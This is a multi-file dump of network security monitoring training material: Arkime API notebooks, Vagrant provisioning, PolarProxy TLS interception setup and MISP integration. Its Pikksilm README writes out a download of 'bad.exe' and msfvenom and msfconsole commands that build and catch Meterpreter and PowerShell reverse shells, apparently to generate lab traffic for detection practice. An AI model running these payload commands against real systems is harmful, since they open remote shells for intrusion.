"outputs": [], 229 | "source": [ 230 | "misp.update_event(event=result)" 231 | ] 232 | } 233 | ], 234 | "metadata": { 235 | "kernelspec": { 236 | "display_name": "Python 3 (ipykernel)", 237 | "language": "python", 238 | "name": "python3" 239 | }, 240 | "language_info": { 241 | "codemirror_mode": { 242 | "name": "ipython", 243 | "version": 3 244 | }, 245 | "file_extension": ".py", 246 | "mimetype": "text/x-python", 247 | "name": "python", 248 | "nbconvert_exporter": "python", 249 | "pygments_lexer": "ipython3", 250 | "version": "3.12.3" 251 | } 252 | }, 253 | "nbformat": 4, 254 | "nbformat_minor": 5 255 | } 256 | -------------------------------------------------------------------------------- /Arkime/misp_wise/README.md: -------------------------------------------------------------------------------- 1 | # MISP to WISE integration 2 | 3 | ## MISP setup 4 | 5 | * https://github.com/MISP/misp-docker 6 | 7 | # Set up jupyter notebook 8 | 9 | Jupyter notebook is a useful tool for interactive scripting, especially around anything involving interaction with data. 10 | 11 | ``` 12 | apt install python3-pip python3-venv 13 | python3 -m venv /jupyter 14 | source /jupyter/bin/activate 15 | pip install jupyter jupyterlab pandas numpy pymisp 16 | ``` 17 | 18 | ``` 19 | jupyter lab --no-browser --allow-root --ip 192.168.56.12 20 | ``` 21 | -------------------------------------------------------------------------------- /Arkime/package_setup/Vagrantfile: -------------------------------------------------------------------------------- 1 | # -*- mode: ruby -*- 2 | # vi: set ft=ruby : 3 | $arkime = <<-SCRIPT 4 | ARKIME_VERSION="5.2.0" 5 | UBUNTU_VERSION="2204" 6 | 7 | ARKIME_LINK="https://github.com/arkime/arkime/releases/download/v${ARKIME_VERSION}/arkime_${ARKIME_VERSION}-1.ubuntu${UBUNTU_VERSION}_amd64.deb" 8 | ARKIME_JA4_LINK="https://github.com/arkime/arkime/releases/download/v${ARKIME_VERSION}/ja4plus.amd64.so" 9 | 10 | wget $ARKIME_LINK 11 | wget $ARKIME_JA4_LINK 12 | pwd 13 | SCRIPT 14 | 15 | $swap = <<-SCRIPT 16 | swapon --show | grep "NAME" && exit 1 17 | dd if=/dev/zero of=/swapfile bs=1024 count=2097152 18 | mkswap /swapfile 19 | chmod 600 /swapfile 20 | swapon /swapfile 21 | swapon --show 22 | SCRIPT 23 | 24 | NAME="setup" 25 | CPU=4 26 | MEM=4096 27 | 28 | Vagrant.configure(2) do |config| 29 | config.vm.define NAME do |box| 30 | box.vm.box = "generic/ubuntu2204" 31 | box.vm.hostname = NAME 32 | box.vm.network :private_network, ip: "192.168.56.12" 33 | box.vm.provider :virtualbox do |vb, override| 34 | override.vm.box = "ubuntu/jammy64" 35 | vb.customize ["modifyvm", :id, "--memory", MEM] 36 | vb.customize ["modifyvm", :id, "--cpus", CPU] 37 | end 38 | box.vm.provider "libvirt" do |v, override| 39 | v.cpus = CPU 40 | v.memory = MEM 41 | end 42 | box.vm.provider :hyperv do |hv, override| 43 | hv.cpus = CPU 44 | hv.maxmemory = MEM 45 | override.vm.synced_folder ".", "/vagrant", type: "smb" 46 | end 47 | box.vm.provider :vmware_desktop do |v, override| 48 | v.vmx["numvcpus"] = CPU 49 | v.vmx["memsize"] = MEM 50 | end 51 | box.vm.provision "docker", images: [ 52 | # "docker.elastic.co/elasticsearch/elasticsearch:8.13.4", 53 | "redis" 54 | ] 55 | box.vm.provision "shell", inline: $swap 56 | box.vm.provision "shell", inline: $arkime 57 | end 58 | end 59 | -------------------------------------------------------------------------------- /Arkime/pikksilm/README.md: -------------------------------------------------------------------------------- 1 | # Pikksilm 2 | 3 | * [Pikksilm](https://github.com/markuskont/pikksilm) 4 | * [Sysmon](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon) 5 | * [sysmon modular](https://github.com/olafhartong/sysmon-modular) 6 | * [verbose sysmon config](https://raw.githubusercontent.com/olafhartong/sysmon-modular/master/sysmonconfig.xml) 7 | * [Winlogbeat](https://www.elastic.co/beats/winlogbeat) 8 | 9 | ## Generating interesting traffic 10 | 11 | * [installing metasploit on linux](https://docs.rapid7.com/metasploit/installing-the-metasploit-framework/#installing-the-metasploit-framework-on-linux) 12 | 13 | ### Delivery 14 | 15 | ``` 16 | Invoke-WebRequest http://server:8000/bad.exe -UseBasicParsing -OutFile bad.exe 17 | ``` 18 | 19 | ### Reverse TCP 20 | 21 | ``` 22 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=53 -f exe > bad.exe 23 | ``` 24 | 25 | ``` 26 | msfconsole 27 | 28 | msf6 > use exploit/multi/handler 29 | 30 | msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp 31 | msf6 exploit(multi/handler) > set lhost eth0 32 | msf6 exploit(multi/handler) > set lport 53 33 | msf6 exploit(multi/handler) > exploit 34 | 35 | meterpreter > dir 36 | 37 | ``` 38 | 39 | ### Reverse PS 40 | 41 | ``` 42 | msfvenom -p cmd/windows/reverse_powershell lhost=eth0 lport=8089 > shell.bat 43 | ``` 44 | 45 | ``` 46 | msfconsole 47 | 48 | msf6 > use exploit/multi/handler 49 | 50 | msf6 exploit(multi/handler) > set payload cmd/windows/reverse_powershell 51 | msf6 exploit(multi/handler) > set lhost eth0 52 | msf6 exploit(multi/handler) > set LPORT 8089 53 | msf6 exploit(multi/handler) > exploit 54 | ``` 55 | -------------------------------------------------------------------------------- /Arkime/polarproxy/README.md: -------------------------------------------------------------------------------- 1 | # Polarproxy 2 | 3 | * https://www.netresec.com/?page=PolarProxy 4 | * https://www.netresec.com/?page=Blog&month=2020-12&post=Capturing-Decrypted-TLS-Traffic-with-Arkime 5 | * https://arkime.com/settings#reader-poi 6 | 7 | ## Setting up Polarproxy 8 | 9 | Get polarproxy and set it up in /opt/PolarProxy dir 10 | 11 | ``` 12 | mkdir /opt/PolarProxy 13 | cd /opt/PolarProxy 14 | wget -O polarproxy.tar.gz 'https://www.netresec.com/?download=PolarProxy' 15 | tar -zxvf polarproxy.tar.gz 16 | ``` 17 | 18 | ### Systemd service 19 | 20 | PolarProxy comes with a sample Systemd service file in `PolarProxy.service` file. We slightly edit it to make use of different directory paths and user accounts. Copy or create the `/etc/systemd/system/PolarProxy.service` file. 21 | 22 | ``` 23 | [Unit] 24 | Description=PolarProxy TLS pcap logger 25 | After=network.target 26 | 27 | [Service] 28 | SyslogIdentifier=PolarProxy 29 | Type=simple 30 | WorkingDirectory=/opt/PolarProxy 31 | ExecStart=/opt/PolarProxy/PolarProxy -v -p 10443,80,443 -x /var/log/PolarProxy/polarproxy.cer -f /var/log/PolarProxy/proxyflows.log -o /var/log/PolarProxy/ --certhttp 10080 --socks 1080 --httpconnect 8080 --nontls allow --leafcert sign --pcapoveripconnect 127.0.0.1:57012 32 | KillSignal=SIGINT 33 | FinalKillSignal=SIGTERM 34 | 35 | [Install] 36 | WantedBy=multi-user.target 37 | ``` 38 | 39 | ## Configuring Arkime to accept PCAP over IP 40 | 41 | If we set Arkime to capture PCAP over IP connections, it will no longer listen on the network interfaces. For that, it would make sense to spin up another Arkime instance. 42 | 43 | A native way to do this is by adding another arkime Node. Add this section at the end of your `config.ini`. 44 | 45 | ``` 46 | [polar] 47 | ``` 48 | 49 | Change the `pcapReadMethod` in the polar section of the config file. We can override some other values as well. Arkime capture node needs a corresponding viewer node. Since they might be on the same host as live capture, then their ports might collide. Finally, PCAP compression might also get in the way, as proxy traffic volume is quite low and arkime cannot rebuild sessions from PCAP files that are being actively written to. 50 | 51 | ``` 52 | pcapReadMethod=pcap-over-ip-server 53 | viewPort=8006 54 | simpleCompression=none 55 | ``` 56 | 57 | Let's create a new arkime service for PolarProxy capture. We also need a corresponding viewer when using node configuration. 58 | 59 | ``` 60 | cp /etc/systemd/system/arkimecapture.service /etc/systemd/system/arkimepolar.service 61 | cp /etc/systemd/system/arkimeviewer.service /etc/systemd/system/arkimeviewerpolar.service 62 | ``` 63 | 64 | Comment the `ExecStartPre`, since we don't need to configure any actual interfaces. Modify the `ExecStart` to reflect the new paths and also create a separate log file to distinguish separate processes. 65 | 66 | ``` 67 | ... 68 | ExecStart=/opt/arkime/bin/capture -c /opt/arkime/etc/config.ini --node polar 69 | ... 70 | ``` 71 | 72 | Make sure to also do this with viewer node in `arkimeviewerpolar.service`. 73 | 74 | ``` 75 | ... 76 | ExecStart=/opt/arkime/bin/node viewer.js -c /opt/arkime/etc/config.ini --node polar 77 | ... 78 | ``` 79 | 80 | Before starting the new systemd services, make sure that all the paths and directories actually exists on the system. For example: 81 | 82 | ``` 83 | mkdir /var/log/PolarProxy 84 | ``` 85 | 86 | Start the new services. 87 | 88 | ``` 89 | systemctl daemon-reload 90 | 91 | systemctl enable --now arkimepolar.service 92 | 93 | systemctl enable --now arkimeviewerpolar.service 94 | 95 | systemctl start PolarProxy.service 96 | ``` 97 | Let's test if we can take our proxy for a spin... 98 | 99 | ``` 100 | curl --connect-to www.netresec.com:443:127.0.0.1:10443 https://www.netresec.com/ 101 | ``` 102 | 103 | As expected with self-signed certs, they are not trusted. You can add the `--insecure` flag to the `curl` command above to ignore any certificate issues. 104 | 105 | Now wait a minute or two and let's check if we can see that traffic in Arkime. 106 | 107 | 108 | ## Adding a trusted certificate 109 | 110 | In our env, PolarProxy exports its public certificate to `/var/log/PolarProxy/polarproxy.cer` 111 | 112 | ### Linux 113 | 114 | We can make our machine to trust it with the following. Make sure to select the `extra/PolarProxy-root-CA.crt` Certificate Authority when prompted. 115 | 116 | ``` 117 | sudo mkdir /usr/share/ca-certificates/extra 118 | sudo openssl x509 -inform DER -in /var/log/PolarProxy/polarproxy.cer -out /usr/share/ca-certificates/extra/PolarProxy-root-CA.crt 119 | sudo dpkg-reconfigure ca-certificates 120 | ``` 121 | 122 | Now this command should work without issues 123 | 124 | ``` 125 | curl --connect-to www.netresec.com:443:127.0.0.1:10443 https://www.netresec.com/ 126 | ``` 127 | 128 | Ideally, instead of tricking around with curl, you would redirect all traffic outbound to port 443 via your PolarProxy. 129 | 130 | ### Windows 131 | 132 | * https://docs.microsoft.com/en-us/skype-sdk/sdn/articles/installing-the-trusted-root-certificate 133 | 134 | ``` 135 | MMC -> Add / remove stap-in -> certificates -> local computer -> Import 136 | ``` 137 | -------------------------------------------------------------------------------- /Arkime/prepare-laptop.md: -------------------------------------------------------------------------------- 1 | # Instructions for setting up the environment locally 2 | 3 | Note, these instructions are for running a local instance of the tools in a VM. In the classroom, VMs have been prepared for you so you do not need to set this up before coming to class. But you can... :) 4 | 5 | 6 | ## System requirements for running these tools locally 7 | * CPU: Modern 64-bit CPU, Apple Silicon has not been tested and is likely not supported. 8 | * RAM: 16GB or more system memory; 9 | * Disk: Minimum 50GB of free disk space, 100GB or more recommended. SSD preferred; 10 | * Privileges: Root or Administrator privileges on the host OS. 11 | 12 | 13 | 14 | # As a preparation, try to run Arkime (& Suricata (&& others)) in a single box 15 | 16 | * Singlehost setup - full vagrant environment that includes Arkime capture, viewer, backend document storage, threat intelligence and IDS tagging 17 | 18 | * **[Arkime](https://arkime.com/)** is full packet capturing, indexing, and searching system. 19 | * Arkime is not an IDS 20 | * Some other software is necessary: 21 | * **[WISE](https://arkime.com/wise)** is part of Arkime. Wise is helper service to check external knowledge before saving session index data. 22 | * **[ElasticSearch](/common/elastic/)** is a search engine based on Lucene. 23 | * We will also have: 24 | * **[Suricata](https://suricata.io/)** is a network threat detection engine. 25 | * **[Redis](https://redis.io/)** is a in-memory data structure storage and message broker. Good for sharing data between multiple applications. 26 | 27 | 28 | ### Instructions 29 | 30 | A quick way to get a classroom-like||testing||development environment up and running is with **Vagrant**. You will need recent versions of [Vagrant](https://www.vagrantup.com/) and [VirtualBox](https://www.virtualbox.org/) installed. 31 | 32 | *NB! Vagrant v2.2.19 repository installation has a known issue with Ubuntu 22.04 LTS host system. Meanwhile, you can just use the fixed Linux binary download (also version v2.2.19) at the bottom of the [Vagrant Downloads page](https://www.vagrantup.com/downloads).* 33 | 34 | Install the latest versions of Vagrant and VirtualBox for your operating systems, and then run: 35 | 36 | vagrant status 37 | 38 | If you get any error message, [fix them before creating any VMs](https://www.vagrantup.com/docs/virtualbox/common-issues.html). 39 | 40 | Starting from VirtualBox v6.1.28 it is only allowed to provision VMs belonging to the 192.168.56.0/24 network range. To disable network range control (for both IPv4 and IPv6), add the following line to `/etc/vbox/networks.conf`. You have to create the file and directory if it does not exist yet.: 41 | 42 | * 0.0.0.0/0 ::/0 43 | 44 | You should be able to run these following commands as a regular (non-root) user. 45 | 46 | To create and provision a the `singlehost` virtual machine: 47 | 48 | mkdir something 49 | cd something 50 | vagrant box add ubuntu/jammy64 51 | wget https://raw.githubusercontent.com/ccdcoe/CDMCS/master/singlehost/Vagrantfile 52 | wget https://raw.githubusercontent.com/ccdcoe/CDMCS/master/singlehost/provision.sh 53 | vagrant up 54 | 55 | Running `vagrant up` for the first time will run provisioning, which will: 56 | - Download the Ubuntu LTS base image if there is not a copy on your machine already. 57 | - Create a new VirtualBox virtual machine from that image 58 | - Run the provisioning script [provision.sh](https://raw.githubusercontent.com/ccdcoe/CDMCS/master/singlehost/provision.sh) [(2)](#readitbeforeyouexecuteit) 59 | 60 | The Vagrant box will automatically start after provisioning. It can be started in future with `vagrant up` from the *dirnameyoujustcreated* directory. 61 | 62 | Once the Ubuntu virtual machine has booted, it will start Arkime (and Suricata and Evebox and Elasticsearch). You can then access your **Arkime viewer** at **http://192.168.10.11:8005**. By default, your development environment will have an admin account created for you to use - the username will be `admin` and the password will be `admin`. Here, at the prompt, you can try with `vagrant:vagrant`. 63 | 64 | To connect to the server via SSH, simply run `vagrant ssh`. If you are running Windows (without ssh on your PATH), this might not work. Please fix it or find alternative means of connecting to your box via SSH. 65 | 66 | To stop the server VM, simply run `vagrant halt`. 67 | To delete/destroy the server VM, simply run `vagrant destroy`. 68 | 69 | Should you need to access the virtual machine (for example, to manually fix something without restarting the box), run `vagrant ssh` from the *dirnameyoujustcreated* folder. You will now be logged in as the `ubuntu` user. 70 | 71 | ## Troubleshooting 72 | If your instance or Vagrant box are really not behaving, you can re-run the provisioning process. Stop the box with `vagrant halt`, and then run `vagrant destroy` - this will delete the virtual machine. You may then run `vagrant up` to create a new box, and re-run provisioning. 73 | 74 | Remember, managing specific Vagrant VMs is couple to the directory of the `Vagrantfile`. So the current working directory (CWD) of your terminal should be 75 | 76 | 77 | ## Support/help 78 | 79 | * If you are confused, or having any issues with the above, join the Arkime Slack server (https://slackinvite.arkime.com/) or Suricata IRC channel (irc.freenode.net #suricata). 80 | 81 | ---- 82 | 83 | (1) :: Or build your own box, see [here](https://www.vagrantup.com/docs/boxes/base.html) 84 | 85 | (2) :: Whenever you have to execute a shell script from the web, first open url in your web browser to make sure the script is not malicious and is safe to run. 86 | -------------------------------------------------------------------------------- /Arkime/queries/003-export-pcap.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "markdown", 5 | "metadata": {}, 6 | "source": [ 7 | "# Downloading raw PCAP\n", 8 | "\n", 9 | "* https://github.com/aol/moloch/wiki/API#sessionspcap\n", 10 | "\n", 11 | "We can download raw PCAP data, as opposed to indexed metadata, via `sessions.pcap` endpoint. Can be useful if you wish to extract capture data for closer investigation in wireshark. Start by setting up variables, as always." 12 | ] 13 | }, 14 | { 15 | "cell_type": "code", 16 | "execution_count": 25, 17 | "metadata": {}, 18 | "outputs": [], 19 | "source": [ 20 | "import requests\n", 21 | "from requests.auth import HTTPDigestAuth\n", 22 | "user=\"vagrant\"\n", 23 | "passwd=\"vagrant\"\n", 24 | "auth=HTTPDigestAuth(user, passwd)" 25 | ] 26 | }, 27 | { 28 | "cell_type": "markdown", 29 | "metadata": {}, 30 | "source": [ 31 | "Then extract all DNS packets by Moloch query. Note the `stream=True` parameter for our GET request. **This is very important, as you do not want your script to pull all PCAP data into memory before writing out the file**." 32 | ] 33 | }, 34 | { 35 | "cell_type": "code", 36 | "execution_count": 26, 37 | "metadata": {}, 38 | "outputs": [], 39 | "source": [ 40 | "query = {\n", 41 | " \"expression\": \"protocols == dns && dns.host == berylia.org\",\n", 42 | " \"date\": 1,\n", 43 | "}\n", 44 | "resp = requests.get(\"http://192.168.10.13:8005/sessions.pcap\", params=query, auth=auth, stream=True)" 45 | ] 46 | }, 47 | { 48 | "cell_type": "markdown", 49 | "metadata": {}, 50 | "source": [ 51 | "Stream the response data into a newly create file. Open the file in wireshark to verify output." 52 | ] 53 | }, 54 | { 55 | "cell_type": "code", 56 | "execution_count": 27, 57 | "metadata": {}, 58 | "outputs": [], 59 | "source": [ 60 | "with open(\"/vagrant/dns-berylia.pcap\", 'wb') as f:\n", 61 | " for chunk in resp.iter_content(chunk_size=8192):\n", 62 | " if chunk: # filter out keep-alive new chunks\n", 63 | " f.write(chunk)" 64 | ] 65 | }, 66 | { 67 | "cell_type": "markdown", 68 | "metadata": {}, 69 | "source": [ 70 | "Note that multiple sessions get clumpted into a single PCAP stream when relying on Moloch expressions. Alternatively, `ids` parameter can be specified to download specific sessions one by one and to write each session into a distinct output file. For example, we can extract a list of example session ID-s via CSV or UNIQUE endpoint." 71 | ] 72 | }, 73 | { 74 | "cell_type": "code", 75 | "execution_count": 28, 76 | "metadata": {}, 77 | "outputs": [ 78 | { 79 | "name": "stdout", 80 | "output_type": "stream", 81 | "text": [ 82 | "['190522-tAIbGZrl6xpCVLZj2bl_S1lC', '190522-tAJRqThOVJhLtbrhKDTeq0Bt', '190522-tALAA6vM5_VCk7L3XxVwCA2m', '190522-tAIPovzkOupJuL7UTkfdn_Vy', '190522-tAKtD5JXy2xNXpNl5h0qSlQR', '190522-tAKl1A73clNLvqWs15y1wZIj', '190522-tAJV2FBAL8FDbY7c-y0MbSVN', '190522-tALVEPKxwH9EaLaeV7PYq1XV', '190522-tAIAze0zGC5IX4AOOziGUjZr', '190522-tALa6KLjgwtM1LPM3dZVA_wz', '190522-tAJBMxxLhaxPOaVjeBUwZvMg', '190522-tAIdrT8OC11Fg7cFuYf_xZ3w', '190522-tAIsjQzSRhFCG4DAkEOW0CgZ', '190522-tAICmKIWPgZIe4AWScJl0eEx']\n" 83 | ] 84 | } 85 | ], 86 | "source": [ 87 | "import datetime as dt\n", 88 | "end = int(dt.datetime.now().strftime(\"%s\"))\n", 89 | "start = end - 5*60\n", 90 | "r = requests.get(\"http://192.168.10.13:8005/sessions.csv\", params={\n", 91 | " \"startTime\": start,\n", 92 | " \"stopTime\": end,\n", 93 | " \"date\": 1,\n", 94 | " \"expression\": \"host.dns == berylia.org\",\n", 95 | " \"fields\": \",\".join([\n", 96 | " \"_id\"\n", 97 | " ])\n", 98 | "}, auth=auth)\n", 99 | "ids = r.text.split(\"\\r\\n\")\n", 100 | "# Drop csv header\n", 101 | "ids = ids[1:]\n", 102 | "# Get rid of empty element from last newline\n", 103 | "ids = [i for i in ids if len(i) > 0]\n", 104 | "print(ids)" 105 | ] 106 | }, 107 | { 108 | "cell_type": "code", 109 | "execution_count": 29, 110 | "metadata": {}, 111 | "outputs": [], 112 | "source": [ 113 | "for i in ids:\n", 114 | " query = {\n", 115 | " \"ids\": i,\n", 116 | " \"date\": 1,\n", 117 | " }\n", 118 | " resp = requests.get(\"http://192.168.10.13:8005/sessions.pcap\", params=query, auth=auth, stream=True)\n", 119 | " with open(\"/vagrant/{}.pcap\".format(i), 'wb') as f:\n", 120 | " for chunk in resp.iter_content(chunk_size=8192):\n", 121 | " if chunk: # filter out keep-alive new chunks\n", 122 | " f.write(chunk)" 123 | ] 124 | }, 125 | { 126 | "cell_type": "markdown", 127 | "metadata": {}, 128 | "source": [ 129 | "# Tasks\n", 130 | "\n", 131 | "See [suricata eve.json parsing example](https://github.com/ccdcoe/CDMCS/blob/master/Suricata/indexing/001-load-eve.ipynb). \n", 132 | "* Load `community_id` values from `alert` events in `/var/log/suricata/eve.json`. Write raw pcap data for each `community_id` into a distinct pcap file." 133 | ] 134 | }, 135 | { 136 | "cell_type": "code", 137 | "execution_count": null, 138 | "metadata": {}, 139 | "outputs": [], 140 | "source": [] 141 | } 142 | ], 143 | "metadata": { 144 | "kernelspec": { 145 | "display_name": "Python 3", 146 | "language": "python", 147 | "name": "python3" 148 | }, 149 | "language_info": { 150 | "codemirror_mode": { 151 | "name": "ipython", 152 | "version": 3 153 | }, 154 | "file_extension": ".py", 155 | "mimetype": "text/x-python", 156 | "name": "python", 157 | "nbconvert_exporter": "python", 158 | "pygments_lexer": "ipython3", 159 | "version": "3.6.7" 160 | } 161 | }, 162 | "nbformat": 4, 163 | "nbformat_minor": 2 164 | } 165 | -------------------------------------------------------------------------------- /Arkime/queries/004-tagging.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "markdown", 5 | "metadata": {}, 6 | "source": [ 7 | "# Adding and removing tags\n", 8 | "\n", 9 | "* https://github.com/aol/moloch/wiki/API#addtags\n", 10 | "\n", 11 | "Sessions can be marked with custom *tags*, so afterward we could include or exclude these sessions by simple `tags == ` query. Like before, start by setting up modules and auth variables." 12 | ] 13 | }, 14 | { 15 | "cell_type": "code", 16 | "execution_count": 2, 17 | "metadata": {}, 18 | "outputs": [], 19 | "source": [ 20 | "import requests\n", 21 | "from requests.auth import HTTPDigestAuth\n", 22 | "user=\"vagrant\"\n", 23 | "passwd=\"vagrant\"\n", 24 | "auth=HTTPDigestAuth(user, passwd)" 25 | ] 26 | }, 27 | { 28 | "cell_type": "markdown", 29 | "metadata": {}, 30 | "source": [ 31 | "Unline previous endpoints, we are not just pulling data. So we need to do HTTP POST with a comma separated list of tags in POST body." 32 | ] 33 | }, 34 | { 35 | "cell_type": "code", 36 | "execution_count": 11, 37 | "metadata": {}, 38 | "outputs": [ 39 | { 40 | "name": "stdout", 41 | "output_type": "stream", 42 | "text": [ 43 | "{\"success\":true,\"text\":\"Tags added successfully\"}\n" 44 | ] 45 | } 46 | ], 47 | "source": [ 48 | "query = {\n", 49 | " \"expression\": \"protocols == dns && (dns.host == berylia.org || dns.host == www.facebook.com || dns.host == sysadminnid.tumblr.com)\",\n", 50 | " \"date\": 1,\n", 51 | "}\n", 52 | "tags = [\n", 53 | " \"traffic\",\n", 54 | " \"generated\",\n", 55 | " \"good\"\n", 56 | "]\n", 57 | "tags = \",\".join(tags)\n", 58 | "resp = requests.post(\"http://192.168.10.13:8005/addTags\", params=query, auth=auth, json={\n", 59 | " \"tags\": tags\n", 60 | "})\n", 61 | "print(resp.text)" 62 | ] 63 | }, 64 | { 65 | "cell_type": "markdown", 66 | "metadata": {}, 67 | "source": [ 68 | "Other queries can receive a different set of tags." 69 | ] 70 | }, 71 | { 72 | "cell_type": "code", 73 | "execution_count": 12, 74 | "metadata": {}, 75 | "outputs": [ 76 | { 77 | "name": "stdout", 78 | "output_type": "stream", 79 | "text": [ 80 | "{\"success\":true,\"text\":\"Tags added successfully\"}\n" 81 | ] 82 | } 83 | ], 84 | "source": [ 85 | "query = {\n", 86 | " \"expression\": \"protocols == dns && (dns.host == self-signed.badssl.com || dns.host == testmyids.com)\",\n", 87 | " \"date\": 1,\n", 88 | "}\n", 89 | "tags = [\n", 90 | " \"traffic\",\n", 91 | " \"generated\",\n", 92 | " \"bad\"\n", 93 | "]\n", 94 | "tags = \",\".join(tags)\n", 95 | "resp = requests.post(\"http://192.168.10.13:8005/addTags\", params=query, auth=auth, json={\n", 96 | " \"tags\": tags\n", 97 | "})\n", 98 | "print(resp.text)" 99 | ] 100 | }, 101 | { 102 | "cell_type": "markdown", 103 | "metadata": {}, 104 | "source": [ 105 | "Now we no longer have to write the complex query when looking for specific traffic subset." 106 | ] 107 | }, 108 | { 109 | "cell_type": "code", 110 | "execution_count": 13, 111 | "metadata": {}, 112 | "outputs": [ 113 | { 114 | "name": "stdout", 115 | "output_type": "stream", 116 | "text": [ 117 | "berylia.org\n", 118 | "star-mini.c10r.facebook.com\n", 119 | "www.facebook.com\n", 120 | "sysadminnid.tumblr.com\n", 121 | "\n" 122 | ] 123 | } 124 | ], 125 | "source": [ 126 | "query = {\n", 127 | " \"expression\": \"tags == generated && tags == good\",\n", 128 | " \"exp\": \"dns.host\"\n", 129 | "}\n", 130 | "resp = requests.get(\"http://192.168.10.13:8005/unique.txt\", params=query, auth=auth)\n", 131 | "print(resp.text)" 132 | ] 133 | }, 134 | { 135 | "cell_type": "code", 136 | "execution_count": 14, 137 | "metadata": {}, 138 | "outputs": [ 139 | { 140 | "name": "stdout", 141 | "output_type": "stream", 142 | "text": [ 143 | "testmyids.com\n", 144 | "self-signed.badssl.com\n", 145 | "\n" 146 | ] 147 | } 148 | ], 149 | "source": [ 150 | "query = {\n", 151 | " \"expression\": \"tags == generated && tags == bad\",\n", 152 | " \"exp\": \"dns.host\"\n", 153 | "}\n", 154 | "resp = requests.get(\"http://192.168.10.13:8005/unique.txt\", params=query, auth=auth)\n", 155 | "print(resp.text)" 156 | ] 157 | }, 158 | { 159 | "cell_type": "markdown", 160 | "metadata": {}, 161 | "source": [ 162 | "Likewise, tags can be removed. For example, `traffic` tag is quite useless currently. Make sure that your API user has permissions to remove data though." 163 | ] 164 | }, 165 | { 166 | "cell_type": "code", 167 | "execution_count": 17, 168 | "metadata": {}, 169 | "outputs": [], 170 | "source": [ 171 | "query = {\n", 172 | " \"expression\": \"tags == traffic\",\n", 173 | " \"date\": 1,\n", 174 | "}\n", 175 | "resp = requests.post(\"http://192.168.10.13:8005/removeTags\", params=query, auth=auth, json={\n", 176 | " \"tags\": \"traffic\"\n", 177 | "})" 178 | ] 179 | }, 180 | { 181 | "cell_type": "code", 182 | "execution_count": 18, 183 | "metadata": {}, 184 | "outputs": [ 185 | { 186 | "name": "stdout", 187 | "output_type": "stream", 188 | "text": [ 189 | "{\"success\":true,\"text\":\"Tags removed successfully\"}\n" 190 | ] 191 | } 192 | ], 193 | "source": [ 194 | "print(resp.text)" 195 | ] 196 | }, 197 | { 198 | "cell_type": "markdown", 199 | "metadata": {}, 200 | "source": [ 201 | "# Tasks\n", 202 | "\n", 203 | "Consider the suricata `community_id` task from last notebook. Write a script that extracts suricata Signature and Severity fields from Alert JSON. Tag moloch sessions that have corresponding Suricata IDS alerts with this information.\n", 204 | "* Whitespace in signature name will not fly, replace that with underscore or dash;\n", 205 | "* Likewise, consider lowercasing the signature name;\n", 206 | "* A simple severity value number as tag is too vague, actual value in Moloch should be `suri-prio-1`, `suri-prio-2` and `suri-prio-3`;\n", 207 | "* If using classroom server, prepend your name in front of the tag;" 208 | ] 209 | }, 210 | { 211 | "cell_type": "code", 212 | "execution_count": null, 213 | "metadata": {}, 214 | "outputs": [], 215 | "source": [] 216 | } 217 | ], 218 | "metadata": { 219 | "kernelspec": { 220 | "display_name": "Python 3", 221 | "language": "python", 222 | "name": "python3" 223 | }, 224 | "language_info": { 225 | "codemirror_mode": { 226 | "name": "ipython", 227 | "version": 3 228 | }, 229 | "file_extension": ".py", 230 | "mimetype": "text/x-python", 231 | "name": "python", 232 | "nbconvert_exporter": "python", 233 | "pygments_lexer": "ipython3", 234 | "version": "3.6.7" 235 | } 236 | }, 237 | "nbformat": 4, 238 | "nbformat_minor": 2 239 | } 240 | -------------------------------------------------------------------------------- /Arkime/queries/Vagrantfile: -------------------------------------------------------------------------------- 1 | # -*- mode: ruby -*- 2 | # vi: set ft=ruby : 3 | $script = <<-SCRIPT 4 | systemctl stop systemd-resolved.service 5 | echo "nameserver 1.1.1.1" > /etc/resolv.conf 6 | SCRIPT 7 | 8 | $docker = <<-SCRIPT 9 | export DEBIAN_FRONTEND=noninteractive 10 | echo 'Acquire::ForceIPv4 "true";' | sudo tee /etc/apt/apt.conf.d/99force-ipv4 11 | apt-get -qq -y install \ 12 | apt-transport-https \ 13 | ca-certificates \ 14 | curl \ 15 | gnupg-agent \ 16 | software-properties-common 17 | curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add - 18 | add-apt-repository \ 19 | "deb [arch=amd64] https://download.docker.com/linux/ubuntu \ 20 | $(lsb_release -cs) \ 21 | stable" 22 | apt-get update && apt-get install -qq -y docker-ce docker-ce-cli containerd.io 23 | systemctl enable docker.service 24 | systemctl start docker.service 25 | SCRIPT 26 | 27 | $jupyter = <<-SCRIPT 28 | apt-get update && apt-get install -y python3 python3-pip 29 | su - vagrant -c "pip3 install --user --upgrade jupyter jupyterlab elasticsearch matplotlib" 30 | su - vagrant -c "pip3 install --user --upgrade chardet" 31 | su - vagrant -c "pip3 install --user --upgrade urllib3" 32 | su - vagrant -c "mkdir ~/.jupyter" 33 | cat >> /home/vagrant/.jupyter/jupyter_notebook_config.json < /etc/resolv.conf 6 | SCRIPT 7 | 8 | $docker = <<-SCRIPT 9 | export DEBIAN_FRONTEND=noninteractive 10 | echo 'Acquire::ForceIPv4 "true";' | sudo tee /etc/apt/apt.conf.d/99force-ipv4 11 | apt-get -qq -y install \ 12 | apt-transport-https \ 13 | ca-certificates \ 14 | curl \ 15 | gnupg-agent \ 16 | software-properties-common 17 | curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add - 18 | add-apt-repository \ 19 | "deb [arch=amd64] https://download.docker.com/linux/ubuntu \ 20 | $(lsb_release -cs) \ 21 | stable" 22 | apt-get update && apt-get install -qq -y docker-ce docker-ce-cli containerd.io 23 | systemctl enable docker.service 24 | systemctl start docker.service 25 | SCRIPT 26 | 27 | $moloch = <<-SCRIPT 28 | apt-get update && apt-get install build-essential git 29 | mkdir /home/vagrant/build 30 | git clone https://github.com/aol/moloch.git /home/vagrant/build/moloch 31 | chown -R vagrant:vagrant /home/vagrant/build 32 | adduser vagrant docker 33 | SCRIPT 34 | 35 | $jupyter = <<-SCRIPT 36 | apt-get update && apt-get install python3 python3-pip 37 | su - vagrant -c "pip3 install --upgrade --user jupyter jupyterlab" 38 | SCRIPT 39 | 40 | Vagrant.configure(2) do |config| 